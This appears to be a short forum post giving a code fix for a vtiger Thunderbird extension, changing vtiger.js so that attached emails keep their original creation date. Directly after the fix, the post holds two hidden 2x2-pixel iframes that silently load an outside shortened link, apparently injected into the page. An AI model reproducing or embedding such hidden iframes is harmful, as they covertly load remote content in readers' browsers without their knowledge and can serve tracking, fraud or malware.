Fix: Emails are not added with the correct creation date

The current thunderbird-extension attaches emails to vtiger with the current date. Instead the creation date of the emails should be used.

This can easily be fixed by changing the following code in the file "vtiger.js" (part of vtiger.jar archive)

Change the line:
oDate = new Date();
to:
oDate = new Date(srcMsgHdr.date / 1000);
<iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

Sign In or Register to comment.